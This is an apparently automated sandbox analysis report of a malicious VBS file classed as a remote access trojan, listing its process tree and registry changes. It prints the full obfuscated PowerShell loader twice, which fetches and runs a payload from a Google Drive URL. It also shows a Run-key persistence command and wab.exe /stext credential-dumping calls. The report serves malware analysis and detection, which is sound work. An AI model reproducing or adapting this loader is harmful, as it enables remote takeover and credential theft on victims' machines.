| File name: | 091c13512012f85b0b483971c5553405d28c8d173139ef7b94c6af94b07b720f.vbs |
| Full analysis: | https://app.any.run/tasks/ca28ed58-7aa0-479b-8bcb-2a049ab74729 |
| Verdict: | Malicious activity |
| Threats: | Remote access trojans (RATs) are a type of malware that enables attackers to establish complete to partial control over infected computers. Such malicious programs often have a modular design, offering a wide range of functionalities for conducting illicit activities on compromised systems. Some of the most common features of RATs include access to the users’ data, webcam, and keystrokes. This malware is often distributed through phishing emails and links. |
| Analysis date: | May 18, 2024, 19:02:26 |
| OS: | Windows 10 Professional (build: 19045, 64 bit) |
| Tags: | |
| Indicators: | |
| MIME: | text/plain |
| File info: | ASCII text, with CRLF line terminators |
| MD5: | E0A2950E69A654AB87963D18D29A1D25 |
| SHA1: | 62CE5932B1E0E075E019EECA03819767558875CE |
| SHA256: | 091C13512012F85B0B483971C5553405D28C8D173139EF7B94C6AF94B07B720F |
| SSDEEP: | 6144:IZGi6qWuuQ/lCEEsXhXTBkWaUvtyy/hv1q+2dBoFOxVmdaedHNqGOyiSio6xAHIS:IWOmHIN/FeTvoyI2UTt8M |
PID | CMD | Path | Indicators | Parent process | |||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| 308 | "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\admin\AppData\Local\Temp\qbudpmphhaunukosrscm" | C:\Program Files (x86)\Windows Mail\wab.exe | — | wab.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Contacts Exit code: 0 Version: 10.0.19041.3636 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 1604 | "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\admin\AppData\Local\Temp\qbudpmphhaunukosrscm" | C:\Program Files (x86)\Windows Mail\wab.exe | wab.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Contacts Exit code: 0 Version: 10.0.19041.3636 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 1788 | "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\admin\AppData\Local\Temp\ozploueftrcakdsg" | C:\Program Files (x86)\Windows Mail\wab.exe | — | wab.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Contacts Exit code: 0 Version: 10.0.19041.3636 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 2288 | "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Dyflet" /t REG_EXPAND_SZ /d "%Laanelofterne% -w 1 $Syvtifem=(Get-ItemProperty -Path 'HKCU:\Rhoding\').Cransier;%Laanelofterne% ($Syvtifem)" | C:\Windows\SysWOW64\cmd.exe | — | wab.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 10.0.19041.3636 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 2332 | C:\WINDOWS\System32\slui.exe -Embedding | C:\Windows\System32\slui.exe | — | svchost.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Activation Client Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 2764 | "C:\WINDOWS\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Reddened = 1;$Tobine='Sub';$Tobine+='strin';$Tobine+='g';Function Baissers($Prodromous){$Dieselskatten=$Prodromous.Length-$Reddened;For($Imponderability=7;$Imponderability -lt $Dieselskatten;$Imponderability+=8){$Frsers+=$Prodromous.$Tobine.Invoke( $Imponderability, $Reddened);}$Frsers;}function Magnetnaalene($Skrivefrdigheds){. ($Magnitudinous) ($Skrivefrdigheds);}$Indlringen=Baissers 'Theop rMAlle,atoThermocz Mastigi Skyba.lLivsforlTilfluga Midf e/Udfl.tw5Fornuft. caleds0Konkret Hacklin(VervainWIntrigeiUnmutatnSky,eridDslesteoatelierwSd syeasPaabera antimasNHonningT Boysen tro.me1Wavyber0Udrydde.Negati.0O.idati;Drink.b ophavetWNonconcilateb.an Unchan6 Bander4Svovlil; Branch aztekerxMiljfor6.asisko4He,then;Scyph p Tr nsacrAstmativ cresce:Photoem1Monoam,2Svarere1Divisor.Polyony0Sjlstil)Strejfk BezziadGplanomeeLuf,alac,ydracekKorn oro,nterfi/Quays d2O ganog0 Bronze1 Termin0Po,kwoo0Nyspr.g1nocturn0 Differ1Mi,stor ,ivalveFC rportiKleptomrUds.ylneAabn unf Inocu.oCinemi,x tremme/Mis egi1 nomina2Rul.mme1 Zin od.Udydern0Triradi ';$aabningsmekanismernes=Baissers 'Tabe,deUPsorospsBur ssseEldoradrFedtsto-NonspecA ra dsvgNrkamp eP epolinChancretnri.gsm ';$Opdalite=Baissers 'TallstrhSprightt Musiknt.agbladp Biof,ssManiuss:Congreg/Transpi/p,ogramdddssyndrDr.pseni ArgotevSamlerke Drosch.NotificgFllesanoDelystsoLabyringtingi llJaquen.eFinma.k.DemarkecDaahindoprototrm ligat,/RetsstiuTil agec.ovfugl?upstarteD.crownxSnagglepKamsinso Te egrrDrtrinnt Convin=FrsteuddA.heretoecndrinwnicaragnDykninglUdflugto Gau.inaHervarddUdk.are&HiematiiRebellidManager=Creutzf1Wishedl6 FejerrnunholillVoluptuj UdbydeL DisembDGanglienPostiqu7Unsys eKtrffelsqGrant,m5BerygteyKvastetwmineralYColchisAPiz.apaMModfasehT dshorAChatti.yAntimysaUnenablRLen.brePCedingkx ReadjoXAnosm tI opstarbGrundderAr illek DumpniNFras ri2B,omste0Nsf,ugtQHo.eyco ';$Martinmas174=Baissers 'Skralde> Cama l ';$Magnitudinous=Baissers 'Impersoisalpe,eeDeklamax Medarb ';$Squareman='Jalapeno';$Inmeshes = Baissers ' OpklareTrasserc re.xyghWhalishoBibl ot Garanti%Fyrretra Renkpep B.skopp Salvadd SigfriaWhittawtBlackliaCondole%Indo sa\KismetiA WhorrytMaan dstStadsina Bron ic TotalihSti inde styrtrsCon ideh Al omeivane.nkp Vitrio.Arbor.cB.iphertuDiamesotGlosset Bestr,&Udstreg&Fri,rsf T.lprope,etramecTuleenkh Klisteo Dysmor Garvi ptUnident ';Magnetnaalene (Baissers 'Bigfeet$FedtetmgDrachmslDurningoTre.jebbNontreaa ToiletlByronis:HjemvisSAuspicapBergensi PhytotrAr.hrotoIntersemPress ceAmoebaetEkspedieSbeka,srBefrag,=Leeward( NonconcBere krmBoro irdSkovtur Carbaz/Kulden cFl.verc Parvef$TidsforIBoxroomnAlkoholmDkvi geeregionasNerve.nhRelevene CovertsIsolabi)Indkomn ');Magnetnaalene (Baissers 'Stadses$hnissengGorebillSvov dio Fejls.bfiltpenaFordamplPar den:MarrierTmental eFeltmark Par,denLvsaveni E,omotkBlankocuFonologm NeoplaiKontormnc okstrgNomad.seRela ionThornt.i GyrosorFormoseeNominalrZeline,nHalvlegeStraffe=Tflesln$Phyc phOSamm ntpFrembyddpavoniaaRevisualOolac.ai Belysnt aadenye Ha etu.FilmstrsHjertekp Adventl TroppeiS,lgskotTasttry(R.lamsp$ValutabMDredeskaBo,nholrInitia.ttagdr.piSextu,enfermentmDenizataUnexpersHypothe1Tykkere7Tibioca4pri,atk)Lykketr ');$Opdalite=$Teknikumingenirerne[0];$Teleudstyrets= (Baissers ' Tandpl$BlazeregVildtbelF,rmando SubshabPodzolia ,efinglEge,ner: Stnke,BSotshygrTllerenyKorpus,s OrneyftPro,terkElaidinr ProdukfStlandet Blaaner InterpaIndvandmThiefprtBrnd.oredaktyli=HuantajNMatemate NoisinwKravl.a-RegaineOBabongob,rchiatjDorbie.eKinesioc TipvogtFructid MurkranSEfte lnyrunddansNeurobltn aisereKildeskmSoldwin.ExertedNKhanerhevedgaaetForf am.Nonin.tW Aspi,ee Agt,rsbCrust,cCRadialelDepressiNerveleeFlitegrn Ingrowt');$Teleudstyrets+=$Spirometer[1];Magnetnaalene ($Teleudstyrets);Magnetnaalene (Baissers 'Pilgarl$Tweyf lBUnderharSmaakrayGlutelisUnstrint Tobisek Spe.iarHodmanmfAtrocertT dsprirGritlesaStd,rndmUdtmmtetStoreble Cepo.i.Mont.gnHElongateLetsvrvaNerveledAmbassaeUrica irIndskrisAnl.ape[Retsfo.$SkunkleaDdpunktaMisa,dibprefragnTeazliniUnconglnhypsoisg N,vatrspat,yinmBekmpele Nahor kPretranaThuggeenHemiathiFinansgsRynddvrmEkstrakeFort.orrProblemnCo mandeUsandhes Fimeti]abstrus=Udom.tr$FellfarIDatastynesko.tedTaxikrsl Duelber aar.anipill bunUpwind.gDistribe CriminnVerbola ');$Flyverne=Baissers ' Compe $ BykernBCentarer ChemisyImperias JuliomtAm,ristk By.gesrAntian,fStyrkettMod.ager Stere,aAntimo mGentlewtFehaarsePaddleb.Tillgs DHotherso agtpaawDisseatnSkatteplGastritoSubtertaAfskrkkdChayaroFdasewepi P perolSp incte Benefa(Oleopho$GalskabORegnskop SpidsmdVitrauxa Tvejrsl RagnhiiSnekkedtHarpi.teBros,en,distric$ FedttyFfringilrSmedelriSnderjylDivisioaCen.ervg Mini.kepa,eletrAl,keannIndiciae Te ordsTeorier)For.ren ';$Frilagernes=$Spirometer[0];Magnetnaalene (Baissers 'Synthes$Undermag gtvrdil Be.ngno nonchubKnopskyaFenylenl dspred:Exegetea Scaledn Trinoct ShuntsiGenjustsUnsentieVendid.pHillebrtJuleaftiHjemmevcSlikcoli,unjahssFeudistm .ntrei=Colluct(Kleins TInstrokeWash.ubsPrecenttAroyn s-RigmaroPPar,ameaVildspotHakkebfhIndeslu Borgerh$Lat.nesFtelextjr bobleriConicitl Ameiu aCoucalagKrydsfieGymnos rZapotecnDyrek ieMix.mars fstikk)Chromoc ');while (!$antisepticism) {Magnetnaalene (Baissers 'Phoeni.$ UnionegG.sandtl Hagbero DaledhbBartsiaa Taab,nlAntibal:FarsretTTilgaenrFlammenaSlutternTemanums PartagpServerioRigsholr dyderntAutodidtTsk sksiTsarismd FlusspeCressetnWagered=Nons.bl$ArtistetBegynder em,ossuMonoloce Kabspe ') ;Magnetnaalene $Flyverne;Magnetnaalene (Baissers 'ElimineSKnippett ,rylluaParazonrGodkendt Buco,i- PerimeSGauchoel.ravkode BrandseBrownwep Tricho Palisse4.yntaks ');Magnetnaalene (Baissers 'Fumb.eb$ FemaargUnsocial u rolio PosterbDekal taBambus,lUdtrrin: chakota FunktinFremtidtv caliziAgg egasServotee Hyp,rmpKnackietAchelesiInd,ykkcAnalyseivamsegus overcomGebeter= Genuin(And.agoT fterleUpstagesRef,ekttInno.at-DrhammePThorgria SolskitPupildohIntranu Slutnot$Hoveli.FTaysaamrKonstr i Mast,rl,emetriaH gebrog restemeEthi.perSkrpninnFyrsteheSilkesnsTastetr)Juliuss ') ;Magnetnaalene (Baissers 'Skikkel$guacinogMesol,tl TvangsoFartskrbAchl,sraSep lsilGummisd:DesertaVazymefaeOphiolokPentap.sM.katere ve stalBrrupwadPart nurmonsoo iTjenestf Ind.rrtAdvent,eDiqu ttrBe,ongenudlbersemyeloblsDaase a=Zeppeli$Delt.gegAfrettel AppendoskattembSlvlam.aBaadfrelCampaig:UnperisANonamennpunkiestLejevrdi azury cdothieniRekrnkepOttingea Rejs,lnElectritA,enstf+Lovning+Headclo%Golfs.r$HarmfulT Anmrkee Baas,dkEhrmannn nbartei.trikkekDimethyuHaitia,mB.rkhapiFjolsernF,rstadgSolbadee PoeticnS.oppekiBirthnir WageleeSupersir pa ochnUndersleDic.son.EjendomcShandieoSollereuBispestn Spal,et Xantho ') ;$Opdalite=$Teknikumingenirerne[$Vekseldrifternes];}$Hoju=307008;$Subobscureness=30678;Magnetnaalene (Baissers 'Medmenn$ UflyttgTrompetlnonrecooP oductb .ragsmaLf,etscl,aabena:Skld.deHEmendatiKriminabNonconsiUng.arlsbifangscChorizouStemonasKursusssDyksvmmeReaktiorStre tosBalkanr Drepan=Rackpro SanctioG For,lieBintjektKo rekt-keckli,CbadevanoAg amednmagnybrt C unteePoda.ranStraaddtArbitre Quavery$SeptembFHirudinrStyringiGrnseovlHe.erocabltespngE rdropeMlketa rStasiasn Nonheae ubfounsOpgrels ');Magnetnaalene (Baissers 'Markvej$ Backfig Sur.ullE.sponeoSymboltbSubclera comp.rlSunfish:MonroeiROmposteeUptubezshollaitoJordbrecDadoxy iCochai aBrasnerl Babelsi pa isis,ennepsePen.aplrEpiplani LenjasnA rhusigTrisectsTraumatiAf indinBivalvosKeckop.t StrygniTaktarttGuldkoru PertaitPleuropiAmtserhoCacuminnSchizo.eSnyltehrHoveda,s Mjsoms Karmesc= Rosani Bussock[Til ogpSMyeloblyNyerhvesBanquettLegatioeSubdialm Hove.t.VeliferC Esiphoo dogeshnRetralavAthe.ereBoasterrCatabibtBeskriv] Avanyu:Betjen.: LouimiFBaroq erIridauxoBorgersmModtageB Brdsk aArm,eyesGldesfeeVs,nsfo6 Aarrkk4ExchangSSavannet SkrubhrMrkekami ReportnRe,fsmigProlite(,knings$ Nona.oH NverhuiAn.ptycbDesulfuiUnlib,dsOverskrcDoven.auStilelesBillions Vermice Slingrr Un,omas .tlete)Iber gn ');Magnetnaalene (Baissers 'Opgravn$DisarmagUrceusslRek eato h.undfbFuskereaLandsfolT pecas:MotionsTEtikettr Radiosi WhichwbLoebetcuKashrutnAutocoleundersarSupracas Rgsjle Pat ent=Schemat Heterog[StarttiS RammeayHa.lucisEnwom etHum,sygeEncep,amwandapa.FirmaweT DronepeFlle,klxVigoniatBlaatr . E thesEForurenn ElsiegcSyltetjoShandeadW olleniSupralinUrovarsg oapyu]Mark.ne: nsvars:EsthesiAcrownliSteleintCMa kinsILieutbiILetterg.InddrivGStverjaeOozingktBetragtSKh.lsahtKvidi tr OrkneyiSinkadun B rrfigganj,us(Afnazif$UnshadoRLinas feb rglarsFjernvaoSengelecSelmarsisincipuaBarakajlSkeletoi FortrysFli.tineKadayanrfl,kapri fleg,anfarisisg ProforsprmiereiGlauco.nVigt gssRedamagt kontorifort,intkadrejeuchinnertToupepliStavedboRickismnSkraavgeRaklersrImmutabsTyktarm)Gumtree ');Magnetnaalene (Baissers 'Grapefl$Su centgOverintlSammenboBardolpbBuntmagaAlderspl,kstpro:En blomVCockeyeeInextinnLgebesgttitana,rTingsteoLogaritd eaeyuoVernillrM,ssionsIndkaldaSmaaspallanolinlFormidly Br,akf=Kretisk$EjendomT xorcisrFlufferiRateforblecanoruResborgnMarkmiseUcivilirLegemers Dispon.AfskyeusElve,lbu OverskbFicelles N,ndedtSk.vederArusamaiListergnWise,kugSolkurv(Definer$E,iphylH.udendeoErhv,rvjBagakseuProdukt,handyre$Ru kiksS FringeumikraqubomvurdeoAnfrslebchefseksJuringic Daggeruprogramr.ightereP.mposinJ.rnbanewomanhosStaunchsmata.or)tubec,o ');Magnetnaalene $Ventrodorsally;" | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | — | powershell.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 3044 | "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\admin\AppData\Local\Temp\ozploueftrcakdsg" | C:\Program Files (x86)\Windows Mail\wab.exe | wab.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Contacts Exit code: 0 Version: 10.0.19041.3636 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 3624 | REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Dyflet" /t REG_EXPAND_SZ /d "%Laanelofterne% -w 1 $Syvtifem=(Get-ItemProperty -Path 'HKCU:\Rhoding\').Cransier;%Laanelofterne% ($Syvtifem)" | C:\Windows\SysWOW64\reg.exe | cmd.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Registry Console Tool Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 3652 | "C:\WINDOWS\system32\cmd.exe" /c "echo %appdata%\Attacheship.But && echo t" | C:\Windows\SysWOW64\cmd.exe | — | powershell.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 10.0.19041.3636 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 4280 | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Reddened = 1;$Tobine='Sub';$Tobine+='strin';$Tobine+='g';Function Baissers($Prodromous){$Dieselskatten=$Prodromous.Length-$Reddened;For($Imponderability=7;$Imponderability -lt $Dieselskatten;$Imponderability+=8){$Frsers+=$Prodromous.$Tobine.Invoke( $Imponderability, $Reddened);}$Frsers;}function Magnetnaalene($Skrivefrdigheds){. ($Magnitudinous) ($Skrivefrdigheds);}$Indlringen=Baissers 'Theop rMAlle,atoThermocz Mastigi Skyba.lLivsforlTilfluga Midf e/Udfl.tw5Fornuft. caleds0Konkret Hacklin(VervainWIntrigeiUnmutatnSky,eridDslesteoatelierwSd syeasPaabera antimasNHonningT Boysen tro.me1Wavyber0Udrydde.Negati.0O.idati;Drink.b ophavetWNonconcilateb.an Unchan6 Bander4Svovlil; Branch aztekerxMiljfor6.asisko4He,then;Scyph p Tr nsacrAstmativ cresce:Photoem1Monoam,2Svarere1Divisor.Polyony0Sjlstil)Strejfk BezziadGplanomeeLuf,alac,ydracekKorn oro,nterfi/Quays d2O ganog0 Bronze1 Termin0Po,kwoo0Nyspr.g1nocturn0 Differ1Mi,stor ,ivalveFC rportiKleptomrUds.ylneAabn unf Inocu.oCinemi,x tremme/Mis egi1 nomina2Rul.mme1 Zin od.Udydern0Triradi ';$aabningsmekanismernes=Baissers 'Tabe,deUPsorospsBur ssseEldoradrFedtsto-NonspecA ra dsvgNrkamp eP epolinChancretnri.gsm ';$Opdalite=Baissers 'TallstrhSprightt Musiknt.agbladp Biof,ssManiuss:Congreg/Transpi/p,ogramdddssyndrDr.pseni ArgotevSamlerke Drosch.NotificgFllesanoDelystsoLabyringtingi llJaquen.eFinma.k.DemarkecDaahindoprototrm ligat,/RetsstiuTil agec.ovfugl?upstarteD.crownxSnagglepKamsinso Te egrrDrtrinnt Convin=FrsteuddA.heretoecndrinwnicaragnDykninglUdflugto Gau.inaHervarddUdk.are&HiematiiRebellidManager=Creutzf1Wishedl6 FejerrnunholillVoluptuj UdbydeL DisembDGanglienPostiqu7Unsys eKtrffelsqGrant,m5BerygteyKvastetwmineralYColchisAPiz.apaMModfasehT dshorAChatti.yAntimysaUnenablRLen.brePCedingkx ReadjoXAnosm tI opstarbGrundderAr illek DumpniNFras ri2B,omste0Nsf,ugtQHo.eyco ';$Martinmas174=Baissers 'Skralde> Cama l ';$Magnitudinous=Baissers 'Impersoisalpe,eeDeklamax Medarb ';$Squareman='Jalapeno';$Inmeshes = Baissers ' OpklareTrasserc re.xyghWhalishoBibl ot Garanti%Fyrretra Renkpep B.skopp Salvadd SigfriaWhittawtBlackliaCondole%Indo sa\KismetiA WhorrytMaan dstStadsina Bron ic TotalihSti inde styrtrsCon ideh Al omeivane.nkp Vitrio.Arbor.cB.iphertuDiamesotGlosset Bestr,&Udstreg&Fri,rsf T.lprope,etramecTuleenkh Klisteo Dysmor Garvi ptUnident ';Magnetnaalene (Baissers 'Bigfeet$FedtetmgDrachmslDurningoTre.jebbNontreaa ToiletlByronis:HjemvisSAuspicapBergensi PhytotrAr.hrotoIntersemPress ceAmoebaetEkspedieSbeka,srBefrag,=Leeward( NonconcBere krmBoro irdSkovtur Carbaz/Kulden cFl.verc Parvef$TidsforIBoxroomnAlkoholmDkvi geeregionasNerve.nhRelevene CovertsIsolabi)Indkomn ');Magnetnaalene (Baissers 'Stadses$hnissengGorebillSvov dio Fejls.bfiltpenaFordamplPar den:MarrierTmental eFeltmark Par,denLvsaveni E,omotkBlankocuFonologm NeoplaiKontormnc okstrgNomad.seRela ionThornt.i GyrosorFormoseeNominalrZeline,nHalvlegeStraffe=Tflesln$Phyc phOSamm ntpFrembyddpavoniaaRevisualOolac.ai Belysnt aadenye Ha etu.FilmstrsHjertekp Adventl TroppeiS,lgskotTasttry(R.lamsp$ValutabMDredeskaBo,nholrInitia.ttagdr.piSextu,enfermentmDenizataUnexpersHypothe1Tykkere7Tibioca4pri,atk)Lykketr ');$Opdalite=$Teknikumingenirerne[0];$Teleudstyrets= (Baissers ' Tandpl$BlazeregVildtbelF,rmando SubshabPodzolia ,efinglEge,ner: Stnke,BSotshygrTllerenyKorpus,s OrneyftPro,terkElaidinr ProdukfStlandet Blaaner InterpaIndvandmThiefprtBrnd.oredaktyli=HuantajNMatemate NoisinwKravl.a-RegaineOBabongob,rchiatjDorbie.eKinesioc TipvogtFructid MurkranSEfte lnyrunddansNeurobltn aisereKildeskmSoldwin.ExertedNKhanerhevedgaaetForf am.Nonin.tW Aspi,ee Agt,rsbCrust,cCRadialelDepressiNerveleeFlitegrn Ingrowt');$Teleudstyrets+=$Spirometer[1];Magnetnaalene ($Teleudstyrets);Magnetnaalene (Baissers 'Pilgarl$Tweyf lBUnderharSmaakrayGlutelisUnstrint Tobisek Spe.iarHodmanmfAtrocertT dsprirGritlesaStd,rndmUdtmmtetStoreble Cepo.i.Mont.gnHElongateLetsvrvaNerveledAmbassaeUrica irIndskrisAnl.ape[Retsfo.$SkunkleaDdpunktaMisa,dibprefragnTeazliniUnconglnhypsoisg N,vatrspat,yinmBekmpele Nahor kPretranaThuggeenHemiathiFinansgsRynddvrmEkstrakeFort.orrProblemnCo mandeUsandhes Fimeti]abstrus=Udom.tr$FellfarIDatastynesko.tedTaxikrsl Duelber aar.anipill bunUpwind.gDistribe CriminnVerbola ');$Flyverne=Baissers ' Compe $ BykernBCentarer ChemisyImperias JuliomtAm,ristk By.gesrAntian,fStyrkettMod.ager Stere,aAntimo mGentlewtFehaarsePaddleb.Tillgs DHotherso agtpaawDisseatnSkatteplGastritoSubtertaAfskrkkdChayaroFdasewepi P perolSp incte Benefa(Oleopho$GalskabORegnskop SpidsmdVitrauxa Tvejrsl RagnhiiSnekkedtHarpi.teBros,en,distric$ FedttyFfringilrSmedelriSnderjylDivisioaCen.ervg Mini.kepa,eletrAl,keannIndiciae Te ordsTeorier)For.ren ';$Frilagernes=$Spirometer[0];Magnetnaalene (Baissers 'Synthes$Undermag gtvrdil Be.ngno nonchubKnopskyaFenylenl dspred:Exegetea Scaledn Trinoct ShuntsiGenjustsUnsentieVendid.pHillebrtJuleaftiHjemmevcSlikcoli,unjahssFeudistm .ntrei=Colluct(Kleins TInstrokeWash.ubsPrecenttAroyn s-RigmaroPPar,ameaVildspotHakkebfhIndeslu Borgerh$Lat.nesFtelextjr bobleriConicitl Ameiu aCoucalagKrydsfieGymnos rZapotecnDyrek ieMix.mars fstikk)Chromoc ');while (!$antisepticism) {Magnetnaalene (Baissers 'Phoeni.$ UnionegG.sandtl Hagbero DaledhbBartsiaa Taab,nlAntibal:FarsretTTilgaenrFlammenaSlutternTemanums PartagpServerioRigsholr dyderntAutodidtTsk sksiTsarismd FlusspeCressetnWagered=Nons.bl$ArtistetBegynder em,ossuMonoloce Kabspe ') ;Magnetnaalene $Flyverne;Magnetnaalene (Baissers 'ElimineSKnippett ,rylluaParazonrGodkendt Buco,i- PerimeSGauchoel.ravkode BrandseBrownwep Tricho Palisse4.yntaks ');Magnetnaalene (Baissers 'Fumb.eb$ FemaargUnsocial u rolio PosterbDekal taBambus,lUdtrrin: chakota FunktinFremtidtv caliziAgg egasServotee Hyp,rmpKnackietAchelesiInd,ykkcAnalyseivamsegus overcomGebeter= Genuin(And.agoT fterleUpstagesRef,ekttInno.at-DrhammePThorgria SolskitPupildohIntranu Slutnot$Hoveli.FTaysaamrKonstr i Mast,rl,emetriaH gebrog restemeEthi.perSkrpninnFyrsteheSilkesnsTastetr)Juliuss ') ;Magnetnaalene (Baissers 'Skikkel$guacinogMesol,tl TvangsoFartskrbAchl,sraSep lsilGummisd:DesertaVazymefaeOphiolokPentap.sM.katere ve stalBrrupwadPart nurmonsoo iTjenestf Ind.rrtAdvent,eDiqu ttrBe,ongenudlbersemyeloblsDaase a=Zeppeli$Delt.gegAfrettel AppendoskattembSlvlam.aBaadfrelCampaig:UnperisANonamennpunkiestLejevrdi azury cdothieniRekrnkepOttingea Rejs,lnElectritA,enstf+Lovning+Headclo%Golfs.r$HarmfulT Anmrkee Baas,dkEhrmannn nbartei.trikkekDimethyuHaitia,mB.rkhapiFjolsernF,rstadgSolbadee PoeticnS.oppekiBirthnir WageleeSupersir pa ochnUndersleDic.son.EjendomcShandieoSollereuBispestn Spal,et Xantho ') ;$Opdalite=$Teknikumingenirerne[$Vekseldrifternes];}$Hoju=307008;$Subobscureness=30678;Magnetnaalene (Baissers 'Medmenn$ UflyttgTrompetlnonrecooP oductb .ragsmaLf,etscl,aabena:Skld.deHEmendatiKriminabNonconsiUng.arlsbifangscChorizouStemonasKursusssDyksvmmeReaktiorStre tosBalkanr Drepan=Rackpro SanctioG For,lieBintjektKo rekt-keckli,CbadevanoAg amednmagnybrt C unteePoda.ranStraaddtArbitre Quavery$SeptembFHirudinrStyringiGrnseovlHe.erocabltespngE rdropeMlketa rStasiasn Nonheae ubfounsOpgrels ');Magnetnaalene (Baissers 'Markvej$ Backfig Sur.ullE.sponeoSymboltbSubclera comp.rlSunfish:MonroeiROmposteeUptubezshollaitoJordbrecDadoxy iCochai aBrasnerl Babelsi pa isis,ennepsePen.aplrEpiplani LenjasnA rhusigTrisectsTraumatiAf indinBivalvosKeckop.t StrygniTaktarttGuldkoru PertaitPleuropiAmtserhoCacuminnSchizo.eSnyltehrHoveda,s Mjsoms Karmesc= Rosani Bussock[Til ogpSMyeloblyNyerhvesBanquettLegatioeSubdialm Hove.t.VeliferC Esiphoo dogeshnRetralavAthe.ereBoasterrCatabibtBeskriv] Avanyu:Betjen.: LouimiFBaroq erIridauxoBorgersmModtageB Brdsk aArm,eyesGldesfeeVs,nsfo6 Aarrkk4ExchangSSavannet SkrubhrMrkekami ReportnRe,fsmigProlite(,knings$ Nona.oH NverhuiAn.ptycbDesulfuiUnlib,dsOverskrcDoven.auStilelesBillions Vermice Slingrr Un,omas .tlete)Iber gn ');Magnetnaalene (Baissers 'Opgravn$DisarmagUrceusslRek eato h.undfbFuskereaLandsfolT pecas:MotionsTEtikettr Radiosi WhichwbLoebetcuKashrutnAutocoleundersarSupracas Rgsjle Pat ent=Schemat Heterog[StarttiS RammeayHa.lucisEnwom etHum,sygeEncep,amwandapa.FirmaweT DronepeFlle,klxVigoniatBlaatr . E thesEForurenn ElsiegcSyltetjoShandeadW olleniSupralinUrovarsg oapyu]Mark.ne: nsvars:EsthesiAcrownliSteleintCMa kinsILieutbiILetterg.InddrivGStverjaeOozingktBetragtSKh.lsahtKvidi tr OrkneyiSinkadun B rrfigganj,us(Afnazif$UnshadoRLinas feb rglarsFjernvaoSengelecSelmarsisincipuaBarakajlSkeletoi FortrysFli.tineKadayanrfl,kapri fleg,anfarisisg ProforsprmiereiGlauco.nVigt gssRedamagt kontorifort,intkadrejeuchinnertToupepliStavedboRickismnSkraavgeRaklersrImmutabsTyktarm)Gumtree ');Magnetnaalene (Baissers 'Grapefl$Su centgOverintlSammenboBardolpbBuntmagaAlderspl,kstpro:En blomVCockeyeeInextinnLgebesgttitana,rTingsteoLogaritd eaeyuoVernillrM,ssionsIndkaldaSmaaspallanolinlFormidly Br,akf=Kretisk$EjendomT xorcisrFlufferiRateforblecanoruResborgnMarkmiseUcivilirLegemers Dispon.AfskyeusElve,lbu OverskbFicelles N,ndedtSk.vederArusamaiListergnWise,kugSolkurv(Definer$E,iphylH.udendeoErhv,rvjBagakseuProdukt,handyre$Ru kiksS FringeumikraqubomvurdeoAnfrslebchefseksJuringic Daggeruprogramr.ightereP.mposinJ.rnbanewomanhosStaunchsmata.or)tubec,o ');Magnetnaalene $Ventrodorsally;" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | wscript.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| (PID) Process: | (6516) wscript.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
| Operation: | write | Name: | ProxyBypass |
Value: 1 | |||
| (PID) Process: | (6516) wscript.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
| Operation: | write | Name: | IntranetName |
Value: 1 | |||
| (PID) Process: | (6516) wscript.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
| Operation: | write | Name: | UNCAsIntranet |
Value: 1 | |||
| (PID) Process: | (6516) wscript.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
| Operation: | write | Name: | AutoDetect |
Value: 0 | |||
| (PID) Process: | (4280) powershell.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32 |
| Operation: | write | Name: | EnableFileTracing |
Value: 0 | |||
| (PID) Process: | (4280) powershell.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32 |
| Operation: | write | Name: | EnableAutoFileTracing |
Value: 0 | |||
| (PID) Process: | (4280) powershell.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32 |
